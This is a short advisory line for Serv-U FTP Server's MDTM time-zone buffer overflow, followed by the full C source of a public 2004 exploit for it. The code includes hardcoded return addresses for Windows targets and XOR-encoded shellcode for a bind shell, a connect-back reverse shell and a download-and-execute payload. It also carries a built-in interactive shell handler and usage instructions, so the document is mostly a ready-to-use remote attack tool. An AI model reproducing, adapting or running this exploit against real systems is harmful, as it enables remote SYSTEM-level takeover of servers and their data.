// source: https://www.securityfocus.com/bid/9751/info
Serv-U FTP Server has been reported prone to a remote stack based buffer overflow vulnerability when handling time zone arguments passed to the MDTM FTP command.
The problem exists due to insufficient bounds checking. Ultimately an attacker may leverage this issue to have arbitrary instructions executed in the context of the SYSTEM user.
/*
*-----------------------------------------------------------------------
*
* Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author : lion
* : lion@cnhonker.net
* : http://www.cnhonker.com
* Date : 2004-01-07
* Update : 2004-02-24 Who report this bug to Rhino??? Released v5.0.0.4 patched this bug.
* : 2004-02-17 v7.0 Add Download url file and exec shellcode.
* : 2004-02-04 v6.1 Modified to work with UNIX.
* : 2004-02-01 v6.0 Change decode and target, change 'jmp(call) ebx' addr to 'pop,pop,ret' addr, can attack winXP and win2003 now.
* : 2004-01-31 v5.0 Add msvcrt.dll jmp ebx addr, can use on CN/TW/EN/KR/other win2k SP4 if msvcrt.dll not changed.
* : 2004-01-26 v4.2 Change attack target, 2.x to '>= 2.5i' and '<= 2.5h'.
* : 2004-01-22 v4.1 Change connectback shellcode in one, change bind shellcode to rebind shellcode.
* : 2004-01-13 v4.0 Can attack Serv-U 2.x.
* : 2004-01-11 v3.1 Add "PORT" command, can penetrate through the firewall. (shport > 1024)
* : 2004-01-09 v3.0 Put shellcode in file parameter, can attack Serv-U 4.1.0.12
* : 2004-01-08 v2.0 Add connectback shellcode.
* : 2004-01-07 v1.0 Can attack Serv-U v3.0.0.16 ~ v4.1.0.11
* Tested : Windows 2000 Server EN/CN
* : + Serv-U v3.0.0.16 ~ v5.0.0.3
* : + Serv-U v2.5b, v2.5e, v2.5h, v2.5i, v2.5k
* : Windows XP EN/CN
* : + Serv-U v4.x
* Notice : *** Bug find by bkbll (bkbll@cnhonker.net) 2004-01-07 ***
* : *** You need a valid account. include anonymous!!! ***
* : *** This is a Public Version! ***
* Complie :On Windows
* : cl Servu2.c
* :On UNIX
* : gcc -o Servu2 Servu2.c -DUNIX
* Usage :e:\>Servu2
* :Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V7.0 (2004-01-07)
* :Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)
* :Welcome to HUC website http://www.cnhonker.com
* :Usage: Servu2 -i <ip> [Options]
* : -t Show All Target Type.
* :
* :[Options:]
* : -i Target IP Required
* : -t Target Type Default: 0
* : -u FTP Username Default: ftp
* : -p FTP Password Default: ftp@ftp.com
* : -f Port of the FTP Server Default: 21
* : -s Port of the Shell Default: 53
* : -c Connect back IP For connectback shellcode
* : -d Download the URL and Exec Start with 'http://' or 'ftp://'
*------------------------------------------------------------------------
*/
#ifndef UNIX
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")
#else
#define uint32_t DWORD
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#define closesocket(val) close(val)
#define SOCKET unsigned int
#define SOCKADDR_IN struct sockaddr_in
#define BOOL unsigned int
#define TRUE 1
#define FALSE 0
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define USHORT unsigned int
#define Sleep usleep
#define __leave goto exit_try
#define _snprintf snprintf
typedef struct sockaddr* LPSOCKADDR;
#endif
#ifdef UNIX
int GetLastError()
{
return errno;
}
int WSAGetLastError()
{
return errno;
}
#endif
#define MAX_LEN 2048
#define SEH_OFFSET 48-1
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "7.0"
// for rebind shellcode
#define BIND_OFFSET 113
// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88
// default parameter
#define SHELLPORT 53
#define FTPPORT 21
#define DEFTYPE 0
#define DEFUSER "ftp"
#define DEFPASS "ftp@ftp.com"
// for Serv-U 2.x
#define READ_ADDR "\x01\x01\xfd\x7f"
#define READ_OFFSET 5+14+12
struct
{
DWORD dwJMP;
char *szDescription;
}targets[] =
{
{0x7801D07B,"Serv-U 3.x/4.x/5.x ALL 2K SP3/SP4"}, //msvcrt.dll pop,pop,ret addr
// {0x78010394,"Serv-U 3.x/4.x/5.x ALL 2K SP4"}, //msvcrt.dll pop,pop,ret addr
{0x77c22ca7,"Serv-U 3.x/4.x/5.x ALL XP SP1"}, //msvcrt.dll pop,pop,ret addr
// {0x7FFA1CB5,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003
{0x7ffa1571,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003
{0x7ffa1c1b,"Serv-U 3.x/4.x/5.x EN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all EN win2000,winxp,win2003
{0x7ffae617,"Serv-U 3.x/4.x/5.x TW 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all TW win2000,winxp,win2003
// {0x7ffa2186,"Serv-U 3.x/4.x/5.x TW 2K ALL"}, //jmp ebx addr for all TW win2000
{0x7ffa4a1b,"Serv-U 3.x/4.x/5.x KR 2K ALL"}, //jmp ebx addr for all KR win2000
{0x7ffa4512,"Serv-U 2.x >= 2.5i CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003
{0x7ffa4512,"Serv-U 2.x <= 2.5h CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003
{0x7ffa24ce,"Serv-U 2.x >= 2.5i TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003
{0x7ffa24ce,"Serv-U 2.x <= 2.5h TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003
{0x7ffa82a4,"Serv-U 2.x >= 2.5i KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003
{0x7ffa82a4,"Serv-U 2.x <= 2.5h KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003
{0x778e71a3,"Serv-U 2.x >= 2.5i EN 2K SP4"}, //setupapi.dll jmp esp addr
{0x778e71a3,"Serv-U 2.x <= 2.5h EN 2K SP4"}, //setupapi.dll jmp esp addr
// {0x7802ba77,"Serv-U test"},
},v;
unsigned char *szSend[4];
unsigned char szCommand[MAX_LEN];
// 28 bytes decode by lion for overwrite eip, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
// 31 bytes decode by lion for overwrite SEH, don't change this.
unsigned char decode2[]=
"\x5E\x5F\x5B\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43"
"\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion";
// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n";
// 344 bytes rebind shellcode by lion for Serv-U (xor with 0x99)
unsigned char sc[]=
"\x70\xBB\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x5B\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9E\xC0\x71\x30\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
"\xF3\x9B\x66\xCF\x8D\x12\x41\x5E\x9E\x98\x99\x99\x99\xF3\x9D\x14"
"\x8E\xCB\xF3\x9D\xF1\x66\x66\x99\x99\xCA\x66\xCF\x81\x5E\x9E\x9B"
"\x99\x99\xAC\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCF\x85\xF3\x98\xCA"
"\x66\xCF\xB9\xC9\xC9\xCA\x66\xCF\xBD\x12\x41\xAA\x59\xF1\xFA\xF4"
"\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x8D\xC0\x10\x9D\x16"
"\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10\xC6\xD1\x10"
"\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8\xC8\xF3\x98"
"\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66"
"\xCF\x91\x72\x9E\x09\x09\x09\x09\x09\x09\x09\xCA\x66\xCF\xB1\x66"
"\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC7"
"\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x40\x67\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x6B\xCC\x59\x3D\x83\xE9\x5E\x3D\x34\xB7\x70"
"\x7C\xD0\x1F\xD0\x7E\xE0\x5F\xE0";
// 304 bytes connectback shellcode by lion for Serv-U (xor with 0x99)
unsigned char cbsc[]=
"\x70\x9C\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x05\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1A\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
"\xF3\x9B\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99"
"\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD2\xAA\x59"
"\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x89\xC0"
"\x10\x9D\x16\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10"
"\xC6\xD1\x10\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8"
"\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66"
"\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xEC"
"\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF\xB9\x9A\x6C\x72\x9E\x09"
"\x09\x09\x09\x09\x09\x09\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96"
"\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86"
"\xEC\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A"
"\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x6F\x67\x66\x66\x17"
"\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52"
"\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0\x99";
// 194 bytes download url file and exec shellcode by lion (xor with 0x99)
// Tested on Serv-U 3.x/4.x/5.x
unsigned char dusc[]=
"\x70\x3D\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\xDD\x99\x99\x99"
"\x7B\x60\xF1\xF6\xF7\x99\x99\xF1\xEC\xEB\xF5\xF4\xCD\x66\x8F\x12"
"\x71\x71\xB7\x99\x99\x99\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCF"
"\x9D\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
"\xAA\x59\xC9\xC9\xCA\xCE\xC9\x66\xCF\x89\x12\x45\xC9\xCA\x66\xCF"
"\x91\x66\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF"
"\x12\xEF\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27"
"\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC"
"\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44"
"\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\xCE\x66\x66\x66\x17\xD7"
"\x97\x75\x58\xE0\x7C\x21\x01\x67\x13\x97\xE7\x41\x7B\xEA\xAF\x83"
"\xB6\xE9";
// exec file url addr for download url file and exec shellcode
unsigned char downloadurl[255]= "";
void showtype()
{
int i;
// usage(p);
printf( "[Type]:\n");
for(i=0;i<sizeof(targets)/sizeof(v);i++)
{
printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
}
}
void usage(char *p)
{
printf( "Usage:\t%s\t-i <ip> [Options]\n"
"\t\t-t\tShow All Target Type.\n\n"
"[Options:]\n"
"\t-i\tTarget IP Required\n"
"\t-t\tTarget Type Default: %d\n"
"\t-u\tFTP Username Default: %s\n"
"\t-p\tFTP Password Default: %s\n"
"\t-f\tPort of the FTP Server Default: %d\n"
"\t-s\tPort of the Shell Default: %d\n"
"\t-c\tConnect back IP For connectback shellcode\n"
"\t-d\tDownload the URL and Exec Start with 'http://' or 'ftp://'\n\n"
, p, DEFTYPE, DEFUSER, DEFPASS, FTPPORT, SHELLPORT);
//showtype();
}
/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
int l;
char buf[512];
struct timeval time;
unsigned long ul[2];
time.tv_sec = 1;
time.tv_usec = 0;
while (1)
{
ul[0] = 1;
ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}
int main(int argc, char **argv)
{
struct sockaddr_in sa, server, client;
#ifndef UNIX
WSADATA wsd;
#endif
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i,j;
int iType =DEFTYPE, iPort=FTPPORT;
char *ip=NULL, *pUser=DEFUSER, *pPass=DEFPASS, *cbHost=NULL, *url;
char user[128], pass[128];
BOOL bCb=FALSE,bUrl=FALSE, bLocal=TRUE, b2x=FALSE;
unsigned short shport=SHELLPORT, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
printf( "Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\r\n"
"Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)\r\n"
"Welcome to HUC website http://www.cnhonker.com\r\n\n"
, VERSION);
if(argc < 2)
{
usage(argv[0]);
return 1;
}
else if(argc == 2 && argv[1][1] == 't')
{
showtype();
return 1;
}
for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return -1;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return -1;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 't':
iType = atoi(argv[i+1]);
break;
case 'f':
iPort=atoi(argv[i+1]);
break;
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 'd':
url = argv[i+1];
bUrl=TRUE;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return -1;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return -1;
}
if(iPort <1 || iPort >65535 || shport <1 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return -1;
}
if(bUrl)
{
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255)
{
usage(argv[0]);
printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n");
return -1;
}
}
if(strstr(targets[iType].szDescription, "2.x"))
{
b2x = TRUE;
printf("[*] Attack Target is Serv-U 2.x.\r\n");
}
else
{
printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n");
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "MDTM" command
strcpy(szCommand, "MDTM 20031111111111+");
// fill the egg
for(i=0; i<SEH_OFFSET; i++)
{
strcat(szCommand, "\x90");
}
// ret addr
if(b2x)
{
// fill the egg
if(strstr(targets[iType].szDescription, "<"))
{
j = 8;
}
else
{
j = 4;
}
for(i=0; i<j; i++)
{
strcat(szCommand, "\x90");
}
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
memcpy(&szCommand[READ_OFFSET], &READ_ADDR, 4);
// fill the decode
strcat(szCommand, decode);
}
else
{
// fill the seh
for(i=0; i<0x10*1; i+=8)
//for(i=0; i<1; i++)
{
memcpy(&szCommand[strlen(szCommand)], &JMP_OVER, 4);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode2);
}
// fill the space
strcat(szCommand, " ");
// fill the egg
for(i=0; i<0x10; i++)
{
strcat(szCommand, "\x90");
}
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9999;
cbip = inet_addr(cbHost)^0x99999999;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
if(bUrl)
{
memset(downloadurl, 0, sizeof(downloadurl));
// download url exec shellcode
for(i=0;i<strlen(url);i++)
{
downloadurl[i] = url[i] ^ 0x99;
}
downloadurl[i] ^= 0x99;
strcat(szCommand, dusc);
strcat(szCommand, downloadurl);
}
else
{
// rebind shellcode
shport2 = htons(shport)^(u_short)0x9999;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return -1;
}
//printf("send size %d:%s", strlen(szCommand), szCommand);
//printf("buffsize %d\r\n", strlen(szCommand)-5-2);
#ifndef UNIX
__try
#endif
{
#ifndef UNIX
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
#endif
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
#ifndef UNIX
sa.sin_addr.S_un.S_addr=inet_addr(ip);
#else
sa.sin_addr.s_addr=inet_addr(ip);
#endif
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
#ifndef UNIX
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
#else
server.sin_addr.s_addr=inet_addr(cbHost);
#endif
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
if(bUrl)
{
printf("[+] Target Download the file and exec: %s\r\n", url);
printf("[+] Success? Maybe!\r\n");
}
else
{
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
}
#ifdef UNIX
exit_try:
#endif
#ifndef UNIX
__finally
#endif
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
#ifndef UNIX
WSACleanup();
#endif
}
return 0;
}
